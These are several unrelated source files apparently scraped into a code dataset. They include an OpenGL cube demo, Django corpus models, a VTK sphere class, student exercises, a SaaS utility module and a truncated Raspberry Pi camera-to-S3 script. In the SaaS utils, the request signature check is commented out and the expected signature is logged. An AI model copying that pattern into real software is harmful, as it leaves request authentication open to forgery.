glVertex3fv((self.position[0] - self.verticies[vertex][0] + offset, self.position[1] - self.verticies[vertex][1] + offset, self.position[2] - self.verticies[vertex][2] + offset))\r\n glEnd() \r\n\r\ndef ground():\r\n glBegin(GL_QUADS)\r\n for vertex in ground_vertices:\r\n glColor3fv(grass)\r\n glVertex3fv((vertex[0],vertex[1]-0.5,vertex[2]))\r\n glEnd()\r\n\r\ndef skybox():\r\n global verticies\r\n glBegin(GL_QUADS)\r\n for surface in sky_surfaces:\r\n for vertex in surface:\r\n glColor3fv(sky)\r\n glVertex3fv((0.5 - verticies[vertex][0], 0.5 - verticies[vertex][1], 0.5 - verticies[vertex][2]))\r\n glEnd()\r\n\r\ndef events():\r\n global look_up, look_down, look_left, look_right\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):\r\n pygame.quit()\r\n sys.exit()\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == K_UP:\r\n look_up = True\r\n if event.key == K_DOWN:\r\n look_down = True\r\n if event.key == K_LEFT:\r\n look_left = True\r\n if event.key == K_RIGHT:\r\n look_right = True\r\n if event.type == pygame.KEYUP:\r\n if event.key == K_UP:\r\n look_up = False\r\n if event.key == K_DOWN:\r\n look_down = False\r\n if event.key == K_LEFT:\r\n look_left = False\r\n if event.key == K_RIGHT:\r\n look_right = False\r\n\r\ndef rotate_camera():\r\n global look_up, look_down, look_left, look_right, pitch, yaw\r\n if yaw < 0: yaw+=360\r\n elif yaw >= 360: yaw-=360\r\n if look_up and pitch > -90:\r\n pitch -= 2\r\n glRotate(-yaw,0,1,0)\r\n glRotate(-2,1,0,0)\r\n glRotate(yaw,0,1,0)\r\n if look_down and pitch < 90:\r\n pitch += 2\r\n glRotate(-yaw,0,1,0)\r\n glRotate(2,1,0,0)\r\n glRotate(yaw,0,1,0)\r\n if look_left:\r\n yaw -= 2\r\n glRotate(-2,0,1,0)\r\n if look_right:\r\n yaw += 2\r\n glRotate(2,0,1,0)\r\n print(pitch, yaw)\r\n\r\ndef draw():\r\n clock.tick(60)\r\n pygame.display.flip()\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n\r\ncoords = (0, -1, -2) \r\nnew_cube = Cube(coords, verticies, False, (0,1,1))\r\nanother_cube = Cube(coords, verticies)\r\n\r\ncube_right = Cube((2,-1,0), verticies, False, (0,0,1))\r\ncube_left = Cube((-2,-1,0), verticies, False, (1,0,0))\r\ncube_behind = Cube((0,-1,2), verticies)\r\n\r\nwhile True:\r\n events()\r\n skybox()\r\n ground()\r\n new_cube.draw()\r\n another_cube.wireframe()\r\n cube_right.draw()\r\n cube_left.draw()\r\n cube_behind.draw()\r\n rotate_camera()\r\n draw()\r\n","sub_path":"run v2.py","file_name":"run v2.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"431394113","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport math\nimport decimal\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.contrib.contenttypes.fields import GenericForeignKey,\\\n GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom django.contrib.postgres.indexes import BrinIndex\nfrom django.contrib.postgres.fields import JSONField\n\nfrom django.contrib.auth.models import User\nfrom corpus.base_settings import LANGUAGES, LANGUAGE_CODE, DIALECTS\n\nfrom django.contrib.postgres.fields import JSONField\n\nfrom uuid import uuid4\nimport os\nimport hashlib\n\nfrom django.utils.safestring import mark_safe\n\n\ndef get_md5_hexdigest_of_file(file_object):\n hash_md5 = hashlib.md5()\n close_file = False\n change_mode = False\n try:\n if file_object.closed:\n file_object.open('rb')\n close_file = True\n\n for chunk in file_object.chunks():\n hash_md5.update(chunk)\n\n if close_file:\n file_object.close()\n\n result = hash_md5.hexdigest()\n del hash_md5\n return result\n\n except IOError:\n del hash_md5\n return None\n\n\ndef upload_directory(instance, filename):\n d = timezone.now()\n i = str(uuid4())\n return '{0}/{1}.{2}'.format(\n d.strftime('%Y/%m/%d/%H/%M'),\n i,\n filename.split('.')[-1])\n\n\nclass RecordingQualityControl(models.Model):\n good = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is good. Can be any interger >= 0.')\n bad = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is bad. Can be any interger >= 0.')\n approved = models.BooleanField(\n default=False,\n help_text='Approved indicates that the object is suitable for use.')\n approved_by = models.ForeignKey(\n User,\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text='User that approved the object. Should be a user ID.')\n trash = models.BooleanField(\n default=False,\n help_text='Flag for deletion.')\n star = models.PositiveIntegerField(\n default=0,\n help_text='Stars are to indicate an object is amazing. This is a positive\\\n interger field so we can, for example, do a 5 star rating system.')\n follow_up = models.BooleanField(\n default=False,\n help_text='Flag an item for follow up later.')\n noise = models.BooleanField(\n default=False,\n help_text='Check if an item has noise but is still intelligible.')\n content_type = models.ForeignKey(\n ContentType, on_delete=models.SET_NULL, null=True,\n help_text='Model to which this QualityControl refers. This should be \\\n the content type ID. Implemented types are Recordings (id=8),\\\n Sentences (id=10), Transcription Segments (id=24).', blank=True, default=None)\n object_id = models.PositiveIntegerField(null=True, blank=True, default=None)\n content_object = GenericForeignKey('content_type', 'object_id')\n updated = models.DateTimeField(auto_now=True)\n person = models.ForeignKey(\n 'people.Person',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text=\"ID of person associated with this QualityControl object.\\\n For Token Authenticated API calls, passing the string 'self' instead\\\n of an Integer will associate the person of the Token with this QC \\\n object.\")\n\n # Move to Recording QC\n recording = models.ForeignKey(\n 'corpus.Recording',\n related_name='quality_control',\n null=True,\n on_delete=models.CASCADE,)\n\n notes = models.TextField(\n blank=True,\n null=True,\n help_text=\"Field for providing extra information about a review.\")\n\n machine = models.BooleanField(\n default=False,\n help_text='Boolean to indicate if a machine made the review.')\n source = models.ForeignKey(\n 'Source',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text='Used to identify machines.')\n\n pronunciation = models.JSONField(\n blank=True,\n default=None,\n null=True\n )\n\n class Meta:\n unique_together = ((\"object_id\", \"content_type\", \"person\"),)\n indexes = [\n # models.Index(fields=['object_id', 'content_type', ]),\n models.Index(fields=['trash', ]),\n models.Index(fields=['approved', ]),\n models.Index(fields=['good', ]),\n models.Index(fields=['bad', ]),\n # models.Index(fields=['first_name'], name='first_name_idx'),\n ]\n\n def clear(self):\n self.good = 0\n self.bad = 0\n self.approved = False\n self.approved_by = None\n\n def calculate_score(self):\n \"\"\"Listener/reviewer score for this review - the closer to the mean,\n the higher the score. \"\"\"\n\n if self.recording:\n qc = RecordingQualityControl.objects.filter(\n recording__pk=self.recording.pk)\n else:\n return 0\n\n avg = qc.aggregate(\n value=models.Avg(models.F('good') - models.F('bad')))\n\n # normalise to between -1 and 1 - TODO check this is correct\n avg = max(-1, min(1, avg['value'] or 0))\n vote = max(-1, min(1, self.good - self.bad))\n\n return 1 - decimal.Decimal(abs(vote - avg)) / 2\n\n def __str__(self):\n try:\n return u'Recording QC: {0}'.format(self.recording.pk)\n except:\n return u'old sentence?'\n\n def save(self, *args, **kwargs):\n self.recording.save()\n return super().save(*args, **kwargs)\n\n\nclass SentenceQualityControl(models.Model):\n\n good = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is good. Can be any interger >= 0.')\n bad = models.PositiveIntegerField(\n default=0,\n help_text='Indicates the object is bad. Can be any interger >= 0.')\n approved = models.BooleanField(\n default=False,\n help_text='Approved indicates that the object is suitable for use.')\n approved_by = models.ForeignKey(\n User, null=True, blank=True,\n on_delete=models.SET_NULL,\n help_text='User that approved the object. Should be a user ID.')\n trash = models.BooleanField(\n default=False,\n help_text='Flag for deletion.')\n\n updated = models.DateTimeField(auto_now=True)\n person = models.ForeignKey(\n 'people.Person', null=True, blank=True, on_delete=models.SET_NULL)\n\n sentence = models.ForeignKey(\n 'corpus.Sentence',\n related_name='quality_control',\n null=True,\n on_delete=models.SET_NULL)\n\n notes = models.TextField(\n blank=True,\n null=True,\n help_text=\"Field for providing extra information about a review.\")\n\n machine = models.BooleanField(\n default=False,\n help_text='Boolean to indicate if a machine made the review.')\n\n source = models.ForeignKey(\n 'Source',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n help_text='Used to identify machines.')\n\n class Meta:\n unique_together = ((\"sentence\", \"person\"),)\n # indexes = [\n # models.Index(fields=['object_id', 'content_type', ]),\n # # models.Index(fields=['first_name'], name='first_name_idx'),\n # ]\n\n def clear(self):\n self.good = 0\n self.bad = 0\n self.approved = False\n self.approved_by = None\n\n def random_foo(self):\n print(\"Random, as\")\n\n def __str__(self):\n try:\n return u'Sentence QC: {0}'.format(self.sentence.pk)\n except:\n return 'migration error?'\n\n def __str__(self):\n try:\n return u'Sentence QC: {0}'.format(self.sentence.pk)\n except:\n return 'migration error?'\n\nclass Source(models.Model):\n SOURCE_TYPES = (\n ('W', 'Website'),\n ('A', 'Article'),\n ('B', 'Book'),\n ('I', 'Interview'),\n ('S', 'Self'),\n ('D', 'Document'),\n ('M', 'Machine'),\n )\n\n description = models.TextField(\n help_text='Any extra info about the source',\n null=True,\n blank=True)\n author = models.CharField(\n help_text=\"Author's name\",\n max_length=128,\n null=True,\n blank=True)\n source_type = models.CharField(\n max_length=1,\n choices=SOURCE_TYPES,\n null=True,\n blank=True,\n help_text='Source type is a single character.\\\n Valid source types include {0}.'.format(\n \", \".join(\n [\"'{0}' ({1})\".format(i[0], i[1]) for i in SOURCE_TYPES]))\n )\n source_name = models.CharField(\n help_text=\"Name of the source\",\n max_length=256,\n null=True,\n blank=True)\n added_by = models.ForeignKey(\n 'people.Person',\n null=True,\n blank=True,\n on_delete=models.SET_NULL)\n source_url = models.URLField(\n null=True,\n blank=True,\n help_text=\"URL for the source (e.g. a website or API endpoint).\\\n This field can be None.\")\n\n class Meta:\n verbose_name = 'Source'\n verbose_name_plural = 'Sources'\n unique_together = (\n (\"source_name\", \"source_type\", \"author\", 'source_url'),)\n\n def __str__(self):\n return \"{0} by {1}\".format(self.source_name, self.author)\n\n def __str__(self):\n return \"{0} by {1}\".format(self.source_name, self.author)\n\nclass Sentence(models.Model):\n text = models.CharField(\n help_text='The sentence to be spoken.',\n max_length=1024, unique=True\n )\n\n language = models.CharField(\n choices=LANGUAGES,\n max_length=16,\n default=LANGUAGE_CODE\n )\n dialect = models.CharField(\n choices=DIALECTS,\n max_length=8,\n null=True,\n blank=True)\n\n # quality_control = GenericRelation(\n # QualityControl,\n # related_query_name='sentence'\n # )\n\n updated = models.DateTimeField(auto_now=True)\n source = models.ForeignKey(\n 'Source',\n null=True,\n blank=True,\n on_delete=models.SET_NULL)\n\n level = models.PositiveIntegerField(\n default=0,\n blank=True,\n help_text=_(\"An arbritraty level to help us label\\\n the language level of a sentence.\\\n 0 is no level, 1 is beginning, and any value\\\n higher than 1 is gradually harder.\")\n )\n\n class Meta:\n verbose_name = 'Sentence'\n verbose_name_plural = 'Sentences'\n indexes = [\n # models.Index(fields=['quality_control'])\n ]\n\n def clean(self):\n if len(self.text) > 124:\n raise ValidationError('Sentence too long')\n\n if Sentence.objects.exclude(pk=self.pk).filter(text=self.text):\n raise ValidationError('Duplicate sentence')\n\n def __str__(self):\n return self.text\n\n def __str__(self):\n return self.text\n\n def get_features(self):\n import features\n f = features.import_finder(self.language)\n return f(self.text)\n\n\nclass Recording(models.Model):\n person = models.ForeignKey(\n 'people.Person',\n null=True,\n blank=True,\n on_delete=models.SET_NULL\n )\n\n sentence = models.ForeignKey(\n 'Sentence',\n null=True, blank=True,\n on_delete=models.SET_NULL\n )\n\n # quality_control = GenericRelation(\n # QualityControl,\n # related_query_name='recording'\n # )\n\n source = models.ForeignKey(\n 'Source',\n null=True,\n blank=True,\n on_delete=models.SET_NULL)\n\n language = models.CharField(\n verbose_name=_('language'),\n choices=LANGUAGES,\n max_length=16,\n default=LANGUAGE_CODE,\n blank=True,\n help_text='Language for a particular recording')\n\n # Dialect? Add field so we can flag a dialect for a recording.\n dialect = models.CharField(\n choices=DIALECTS,\n max_length=8,\n null=True,\n blank=True,\n verbose_name=_('dialect'))\n\n audio_file = models.FileField(upload_to=upload_directory)\n audio_file_md5 = models.CharField(\n max_length=32, editable=False, default=None, null=True)\n\n created = models.DateTimeField(auto_now_add=True, editable=False)\n updated = models.DateTimeField(auto_now=True)\n sentence_text = models.CharField(max_length=1024, blank=True, null=True)\n duration = models.FloatField(default=0, blank=True)\n\n audio_file_aac = models.FileField(\n upload_to=upload_directory, null=True, blank=True)\n\n audio_file_wav = models.FileField(\n upload_to=upload_directory, null=True, blank=True)\n audio_file_wav_md5 = models.CharField(\n max_length=32, editable=False, default=None, null=True)\n\n user_agent = models.CharField(\n max_length=512, blank=True, null=True)\n\n private = models.BooleanField(\n help_text='Set to prevent public from accessing this recording.',\n default=False)\n\n dataset = models.ForeignKey(\n 'DataSet',\n null=True,\n blank=True,\n on_delete=models.SET_NULL\n )\n\n class Meta:\n verbose_name = 'Recording'\n verbose_name_plural = 'Recordings'\n unique_together = ((\"person\", \"sentence\"),)\n indexes = [\n BrinIndex(fields=['created']),\n models.Index(fields=['-updated']),\n # models.Index(fields=['quality_control'])\n ]\n\n def __str__(self):\n sentence_text = self.get_sentence_text()\n sentence_text = sentence_text[0:64]\n try:\n return f\"{sentence_text} by {self.get_person_name()}\"\n except:\n return f\"{sentence_text}\"\n\n\n def audio_file_admin(self):\n url = self.get_recording_file_url()\n return mark_safe(\"\"\"\n %s\"\"\" % (url, url, url))\n\n def get_recording_file_url(self, request=None):\n from django.urls import reverse\n from django.contrib.sites.models import Site\n \n if request:\n domain = request.META['HTTP_HOST']\n else:\n current_site = Site.objects.get_current()\n domain = current_site.domain\n\n try:\n url = \"https://{1}{0}\".format(\n reverse('corpus:recording_file', kwargs={'pk': self.pk}),\n domain)\n except:\n url = \"\"\n return url\n\n def get_recording_file_name(self):\n parts = self.audio_file.name.split('.')\n parts.pop()\n return os.path.basename('.'.join(parts))\n\n def get_sentence_text(self):\n if self.sentence_text:\n return self.sentence_text\n elif self.sentence:\n return self.sentence.text\n else:\n return 'None' # Some reasone making this _() causes error in admin.\n\n def get_person_name(self):\n if self.person:\n return self.person.full_name\n else:\n return _(u'None')\n\n def calculate_score(self):\n \"\"\"Score awarded for uploading this recording. \"\"\"\n\n approved = self.quality_control \\\n .filter(approved=True)\n\n if approved.count() >= 1:\n return 1\n\n net_votes = self.quality_control \\\n .aggregate(value=models.Sum(models.F('good') - models.F('bad')))\n\n net_votes = decimal.Decimal(net_votes['value'] or 0)\n damper = 4\n return max(0, 1 - math.exp(-(net_votes + 1) / damper))\n\n def save(self, *args, **kwargs):\n if self.audio_file is not None and self.audio_file_md5 is None:\n self.audio_file_md5 = get_md5_hexdigest_of_file(self.audio_file)\n\n # I really don't understand something fundamendal here! why does\n # if self.audio_file_wav is not None: not work!\n try:\n if self.audio_file_wav is not None:\n if self.audio_file_wav_md5 is None:\n self.audio_file_wav_md5 = \\\n get_md5_hexdigest_of_file(self.audio_file_wav)\n except:\n pass\n\n super(Recording, self).save(*args, **kwargs)\n\n\nclass Text(models.Model):\n primary_language = models.CharField(\n verbose_name=_('primary language'),\n choices=LANGUAGES,\n max_length=16,\n default=LANGUAGE_CODE\n )\n secondary_language = models.CharField(\n verbose_name=_('secondary language'),\n choices=LANGUAGES,\n max_length=16,\n blank=True,\n null=True,\n )\n dialect = models.CharField(\n choices=DIALECTS,\n max_length=8,\n null=True,\n blank=True)\n\n copyright = JSONField(null=True, blank=True)\n updated = models.DateTimeField(verbose_name=_('updated'), auto_now=True)\n source = models.ForeignKey(\n 'Source',\n null=True, on_delete=models.SET_NULL,\n verbose_name=_('source'))\n\n notes = models.TextField(\n blank=True,\n null=True,\n help_text='Any miscellaneous observations about the text'\n )\n description = models.TextField(\n blank=True,\n default=True,\n help_text='A description of the contents of this text')\n\n config = JSONField(\n null=True, blank=True,\n help_text='A JSON object with any necessary configuration parameters.')\n\n original_file = models.FileField(\n upload_to=upload_directory,\n help_text=_('This can be any type of file.')\n )\n\n original_file_md5 = models.CharField(\n max_length=32,\n editable=False,\n default=None, null=True)\n\n cleaned_file = models.FileField(\n null=True,\n default=None,\n blank=True,\n upload_to=upload_directory,\n help_text=_('This should a .txt file with ut8 encoding.')\n )\n cleaned_file_md5 = models.CharField(\n max_length=32, editable=False, default=None, null=True)\n\n class Meta:\n verbose_name = _('text')\n verbose_name_plural = _('texts')\n # unique_together = ((\"original_file_md5\", \"content_type\", \"person\"),)\n\n def __str__(self):\n return str(self.original_file)\n\n def __str__(self):\n return str(self.original_file)\n\n def save(self, *args, **kwargs):\n if self.original_file_md5 is None:\n try:\n self.original_file_md5 = \\\n get_md5_hexdigest_of_file(self.original_file)\n except ValueError:\n pass\n\n if self.cleaned_file_md5 is None:\n try:\n self.cleaned_file_md5 = \\\n get_md5_hexdigest_of_file(self.cleaned_file)\n except ValueError:\n pass\n\n super(Text, self).save(*args, **kwargs)\n\n\nclass RecordingMetadata(models.Model):\n recording = models.OneToOneField(\n 'corpus.Recording',\n related_name='metadata',\n on_delete=models.CASCADE,\n unique=True\n )\n\n metadata = models.JSONField(\n null=True,\n blank=True\n )\n\n pronunciation = models.JSONField(\n null=True, blank=True)\n\n updated = models.DateTimeField(auto_now=True)\n created = models.DateTimeField(auto_now_add=True)\n\n\nclass DataSet(models.Model):\n SET_TYPES = (\n ('G', 'Golden'),\n ('H', 'Holout'),\n ('T', 'Test'),\n ('D', 'Development'),\n )\n PURPOSE_TYPES = (\n ('PRN', 'Pronunciation'),\n ('TTS', 'Synthesis'),\n ('STT', 'Speech Recognition'),\n )\n name = models.CharField(\n help_text=\"Name for the dataset\",\n max_length=64,\n )\n description = models.TextField(\n blank=True, null=True\n )\n purpose = models.CharField(\n max_length=3,\n choices=PURPOSE_TYPES,\n )\n set_type = models.CharField(\n max_length=1,\n choices=SET_TYPES,\n )\n metadata = models.JSONField(\n null=True,\n blank=True\n )\n\n def __str__(self):\n return self.name\n","sub_path":"corpora/corpus/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"435100565","text":"\"\"\"\r\nsphere.py -- \r\n \r\nIt sets a sphere's geometric properties. \r\n \r\nDate of creation: 2007-03-17 \r\n \r\nCopyright Robotics and Automation Group, Pontificia Universidad Javeriana - Cali. \r\n Freddy Naranjo Perez, fnaranjo@puj.edu.co \r\n Antonio Alejandro Matta Gomez amatta@puj.edu.co \r\n Julian David Colorado, jdcolorado@puj.edu.co \r\n Juan Camilo Acosta Mejia, jcacosta@puj.edu.co \r\n \r\nSee the file \"license.terms\" for information on usage and redistribution of this file, and for a \r\nDISCLAIMER OF ALL WARRANTIES.\r\n\"\"\"\r\n\r\nimport vtk\r\nfrom vtk.util.colors import *\r\n\r\nclass Sphere:\r\n def __init__( self, ren, geomdim, posorient, lighting, color ):\r\n \"\"\" Inits a sphere's 3d object and its associated color and lighting\"\"\"\r\n \r\n sphere = vtk.vtkSphere()\r\n sphere.SetCenter(0, 0, 0)\r\n sphere.SetRadius(geomdim)\r\n \r\n # The sample function generates a distance function from the implicit\r\n # function (which in this case is the sphereHole). This is then contoured to\r\n # get a polygonal surface.\r\n theSphereSample = vtk.vtkSampleFunction()\r\n theSphereSample.SetImplicitFunction(sphere)\r\n theSphereSample.SetModelBounds(-0.08, 0.08, -0.08, 0.08, -0.08, 0.08)\r\n theSphereSample.SetSampleDimensions(60, 60, 60)\r\n theSphereSample.ComputeNormalsOn()\r\n \r\n #vtk.vtkContourFilter applied in order to get a polygonal surface.\r\n theSphereSurface = vtk.vtkContourFilter()\r\n theSphereSurface.SetInputConnection(theSphereSample.GetOutputPort())\r\n theSphereSurface.SetValue(0, 0.0)\r\n\r\n #Decimation algorithm applied in order to optimaze polygonal surface.\r\n deci = vtk.vtkDecimatePro()\r\n deci.SetInputConnection(theSphereSurface.GetOutputPort())\r\n deci.SetTargetReduction(0.1)\r\n deci.PreserveTopologyOn()\r\n\r\n #Smoothing applied in order to get a better surface.\r\n smooth= vtk.vtkSmoothPolyDataFilter()\r\n smooth.SetInputConnection(deci.GetOutputPort())\r\n smooth.SetNumberOfIterations(20)\r\n\r\n #Normal's computation.\r\n normals = vtk.vtkPolyDataNormals()\r\n normals.SetInputConnection(smooth.GetOutputPort())\r\n normals.FlipNormalsOn()\r\n\r\n #Normal's passed to the poly data mapper.\r\n SphereMapper = vtk.vtkPolyDataMapper()\r\n SphereMapper.SetInputConnection(normals.GetOutputPort())\r\n SphereMapper.ScalarVisibilityOff()\r\n\r\n self.sphereActor = vtk.vtkActor()\r\n self.sphereActor.SetMapper(SphereMapper)\r\n self.sphereActor.GetProperty().SetInterpolationToGouraud()\r\n self.sphereActor.GetProperty().SetColor(color)\r\n self.sphereActor.GetProperty().SetSpecular(.3)\r\n self.sphereActor.GetProperty().SetSpecularPower(30)\r\n self.sphereActor.SetPosition( posorient[0], posorient[1], posorient[2] )\r\n self.sphereActor.SetOrientation( posorient[3], posorient[4], posorient[5] )\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n ","sub_path":" batsim --username jdcolorado11/graphengine/sphere.py","file_name":"sphere.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228395491","text":"#Create a program to take as input 5 student records in the following format:\n#**roll_num** | **name** | **age** | **marks**(out of 100)\n#And then output the records in a tabular form with class average, \n# class highest and class lowest at end in the following format.\n\n#Use dictionaries (list of dictionaries in exact)\n#Insert atleast 5 records\n#Input must be user-given (Optional) validate the user input, i.e marks aren't\n# greater 100 and other such validations you think there might be\nimport pandas as pd\nrolln = list()\nname = list()\nage = list()\nmarks = list()\nn_range = int(input('How many records you want to save: '))\nfor a in range(n_range):\n student_data = input('Enter your roll number,name,age and marks( | separated): ')\n r,n,a,m = student_data.split('|')\n marks.append(int(m))\n rolln.append(int(r))\n name.append(n)\n age.append(a)\n\ndata = { 'ROLLN':rolln , 'NAME':name , 'AGE':age , 'MARKS':marks }\npd.DataFrame(data)\n\nb = max(data['MARKS'])\na = data['MARKS'].index(b)\npd.DataFrame({'Class Highest':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]})\n\nb = min(data['MARKS'])\na = data['MARKS'].index(b)\npd.DataFrame({'Class Lowest':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]})\n\nfor a in data['MARKS']:\n if a>40 and a<50:\n a = data['MARKS'].index(b)\n print(pd.DataFrame({'Class Average':[data['ROLLN'][a],data['NAME'][a],data['AGE'][a],data['MARKS'][a]]}))","sub_path":"week_1/Assignment_Q2.py","file_name":"Assignment_Q2.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"642654115","text":"\n\n\nfrom lib.utils.mytime import UtilTime\nfrom lib.utils.exceptions import PubErrorCustom\nimport hashlib\nfrom lib.utils.log import logger\nfrom app.saas.config import *\n\ndef timeHandler(timeSpan,timeUnit):\n if timeUnit == 'y':\n return UtilTime().today.shift(years=timeSpan).timestamp\n elif timeUnit == 'm':\n return UtilTime().today.shift(months=timeSpan).timestamp\n elif timeUnit == 'd':\n return UtilTime().today.shift(days=timeSpan).timestamp\n elif timeUnit == 'h':\n return UtilTime().today.shift(hours=timeSpan).timestamp\n else:\n return timeUnit\n\n\n\ndef sortKeyStringForDict(data):\n s=\"\"\n for item in sorted({k: v for k, v in data.items() if v != \"\"}):\n s+=data[item]\n return s\n\ndef sha256hex(data):\n sha = hashlib.sha256()\n sha.update(data.encode())\n return sha.hexdigest()\n\ndef sha1hex(data):\n sha = hashlib.sha1()\n sha.update(data.encode())\n return sha.hexdigest()\n\ndef passwordhash(password,salt):\n return sha1hex(\"{}-{}-{}\".format(password,salt,AUTHKEY))\n\ndef signCheckForTx(signature, timestamp, eventId):\n\n if UtilTime().today.shift(seconds=-30).timestamp > int(timestamp):\n logger.info(\"请求timestamp已经超时!\")\n raise PubErrorCustom(\"拒绝访问!\")\n\n stringNew = sortKeyStringForDict(dict(\n token = TOKEN,\n timestamp=timestamp,\n eventId=eventId\n ))\n\n\n sign = sha256hex(stringNew)\n\n logger.info(\"{}----{}----{}\".format(stringNew,signature, sign))\n # if signature != sign:\n # logger.info(\"{}----{}\".format(signature,sign))\n # raise PubErrorCustom(\"签名错误!\")\n\n","sub_path":"app/saas/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405519324","text":"\"\"\"\nThis project lets you try out Tkinter/Ttk and practice it!\n\nAuthors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,\n Mark Hays, Amanda Stouder, Aaron Wilkin, their colleagues,\n and Joseph Conrad.\n\"\"\" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.\n\nimport tkinter\nfrom tkinter import ttk\n\n\ndef main():\n \"\"\" Constructs a GUI with stuff on it. \"\"\"\n # -------------------------------------------------------------------------\n # DONE: 2. After reading and understanding the m1e module,\n # ** make a window that shows up. **\n # -------------------------------------------------------------------------\n window = tkinter.Tk()\n #window.mainloop()\n # -------------------------------------------------------------------------\n # DONE: 3. After reading and understanding the m2e module,\n # ** put a Frame on the window. **\n # -------------------------------------------------------------------------\n my_frame = ttk.Frame(window, relief=\"sunken\", padding=(20,20), borderwidth = 3)\n\n my_frame.grid()\n # -------------------------------------------------------------------------\n # DONE: 4. After reading and understanding the m2e module,\n # ** put a Button on the Frame. **\n # -------------------------------------------------------------------------\n my_button = ttk.Button(my_frame, text=\"Click Me\")\n my_button.grid()\n # -------------------------------------------------------------------------\n # DONE: 5. After reading and understanding the m3e module,\n # ** make your Button respond to a button-press **\n # ** by printing \"Hello\" on the Console. **\n # -------------------------------------------------------------------------\n my_button['command'] = lambda : print(\"Hello\")\n # -------------------------------------------------------------------------\n # DONE: 6. After reading and understanding the m4e module,\n # -- Put an Entry box on the Frame.\n # -- Put a second Button on the Frame.\n # -- Make this new Button, when pressed, print \"Hello\"\n # on the Console if the current string in the Entry box\n # is the string 'ok', but print \"Goodbye\" otherwise.\n # -------------------------------------------------------------------------\n def print_contents(contents):\n stuff = contents.get()\n if stuff == 'ok':\n print(\"Hello\")\n else:\n print(\"Goodbye\")\n\n my_entry = ttk.Entry(my_frame)\n my_entry.grid()\n\n get_button = ttk.Button(my_frame, text=\"get entry\")\n get_button['command'] = lambda: print_contents(my_entry)\n get_button.grid()\n\n # -------------------------------------------------------------------------\n # DONE: 7.\n # -- Put a second Entry on the Frame.\n # -- Put a third Button on the frame.\n # -- Make this new Button respond to a button-press as follows:\n #\n # Pressing this new Button causes the STRING that the user typed\n # in the FIRST Entry box to be printed N times on the Console,\n # where N is the INTEGER that the user typed\n # in the SECOND Entry box.\n #\n # If the user fails to enter an integer,\n # that is a \"user error\" -- do NOT deal with that.\n #\n # -------------------------------------------------------------------------\n ####################################################################\n # HINT:\n # You will need to obtain the INTEGER from the STRING\n # that the GET method returns.\n # Use the int function to do so, as in this example:\n # s = entry_box.get()\n # n = int(s)\n ####################################################################\n def print_N_times(entry1, entry2):\n stri = entry1.get()\n integer = int(entry2.get())\n\n for k in range(integer):\n print(stri)\n\n entry2.delete(0,len(entry2.get()))\n entry1.delete(0, len(entry1.get()))\n\n sec_entry = ttk.Entry(my_frame)\n sec_entry.grid()\n\n sec_button = ttk.Button(my_frame, text=\"Print string N times\")\n sec_button['command'] = lambda: print_N_times(my_entry, sec_entry)\n sec_button.grid()\n\n # -------------------------------------------------------------------------\n # DONE: 8. As time permits, do other interesting GUI things!\n # -------------------------------------------------------------------------\n radio_b = ttk.Radiobutton(my_frame, text=\"hello\")\n radio_b.grid()\n window.mainloop()\n\n\n# -----------------------------------------------------------------------------\n# Calls main to start the ball rolling.\n# -----------------------------------------------------------------------------\nmain()\n","sub_path":"src/m5_tkinter_practice.py","file_name":"m5_tkinter_practice.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64959587","text":"import numpy as np\nimport cv2\nimport time\nimport autoupload\nimport glob, os\nimport boto3\nfrom botocore.exceptions import ClientError\nimport logging\ns3= boto3.client('s3')\n# haar_face_cascade = cv2.CascadeClassifier('/home/pi/project/opencvlb/data/haarcascades/haarcascade_frontalface_default.xml')\nhaar_face_cascade = cv2.CascadeClassifier('/home/pi/project/opencvlb/data/haarcascades/haarcascade_upperbody.xml')\n\nvideo = cv2.VideoCapture(0) \n\nfps =10 #video.get(cv2.CAP_PROP_FPS)\n#코덱 정의 및 videoWriter 개체 생성\nfourcc = cv2.VideoWriter_fourcc(*'mp4v')\nDetectCount=0\nFrameCount=0\ndelay =round(1000/fps)\nrecordtime= fps *5\n\n\ndef upload_file(file_name, bucket, object_name=None):\n \"\"\"Upload a file to an S3 bucket\n\n :param file_name: File to upload\n :param bucket: Bucket to upload to\n :param object_name: S3 object name. If not specified then file_name is used\n :return: True if file was uploaded, else False\n \"\"\"\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = 'public/'+file_name\n\n # Upload the file\n try:\n s3.upload_file(file_name, bucket, object_name)\n except ClientError as 